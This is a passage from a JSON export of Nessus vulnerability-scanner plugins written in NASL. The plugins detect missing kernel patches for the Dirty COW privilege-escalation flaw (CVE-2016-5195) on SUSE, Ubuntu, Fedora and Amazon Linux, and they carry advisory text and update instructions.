possible\nwithout introducing additional issues.", "modified": "2020-05-02T00:00:00", "id": "SUSE_SU-2016-2657-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94324", "published": "2016-10-27T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2657-1) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2657-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94324);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/11 11:22:14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2657-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-5195: A local privilege escalation using\n MAP_PRIVATE was fixed, which is reportedly exploited in\n the wild (bsc#1004419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1004419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5195/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162657-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46c4b780\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1562=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1562=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_54-default-3-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_54-xen-3-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-01T03:00:30", "bulletinFamily": "scanner", "description": "It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-02T00:00:00", "id": "UBUNTU_USN-3106-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94155", "published": "2016-10-20T00:00:00", "title": "Ubuntu 16.04 LTS : linux vulnerability (USN-3106-1) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3106-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94155);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3106-1\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux vulnerability (USN-3106-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3106-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.4-generic,\nlinux-image-4.4-generic-lpae and / or linux-image-4.4-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3106-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-45-generic\", pkgver:\"4.4.0-45.66\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-45-generic-lpae\", pkgver:\"4.4.0-45.66\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-45-lowlatency\", pkgver:\"4.4.0-45.66\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-03T02:17:20", "bulletinFamily": "scanner", "description": "The 4.7.9 stable update contains a number of important fixes across\nthe tree. In particular, it includes a fix for CVE-2016-5195.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-05-02T00:00:00", "id": "FEDORA_2016-C3558808CD.NASL", "href": "https://www.tenable.com/plugins/nessus/94212", "published": "2016-10-24T00:00:00", "title": "Fedora 23 : kernel (2016-c3558808cd) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-c3558808cd.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94212);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/09/25 17:12:09\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"FEDORA\", value:\"2016-c3558808cd\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Fedora 23 : kernel (2016-c3558808cd) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.7.9 stable update contains a number of important fixes across\nthe tree. In particular, it includes a fix for CVE-2016-5195.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-c3558808cd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-c3558808cd\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.7.9-100.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-01T03:00:30", "bulletinFamily": "scanner", "description": "USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-02T00:00:00", "id": "UBUNTU_USN-3106-2.NASL", "href": "https://www.tenable.com/plugins/nessus/94156", "published": "2016-10-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial vulnerability (USN-3106-2) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3106-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94156);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3106-2\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial vulnerability (USN-3106-2) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3106-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.4-generic,\nlinux-image-4.4-generic-lpae and / or linux-image-4.4-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3106-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-generic\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-generic-lpae\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-lowlatency\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-03T01:50:03", "bulletinFamily": "scanner", "description": "A race condition was found in the way the Linux kernel", "modified": "2020-05-02T00:00:00", "id": "ALA_ALAS-2016-757.NASL", "href": "https://www.tenable.com/plugins/nessus/94182", "published": "2016-10-21T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2016-757) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-757.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94182);\n script_version(\"2.18\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"ALAS\", value:\"2016-757\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2016-757) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system.\n\n(Updated 2016-11-10: This advisory was upgraded to Critical.)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-757.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update kernel' to update your system. You will need to reboot\nyour system in order for the new kernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", 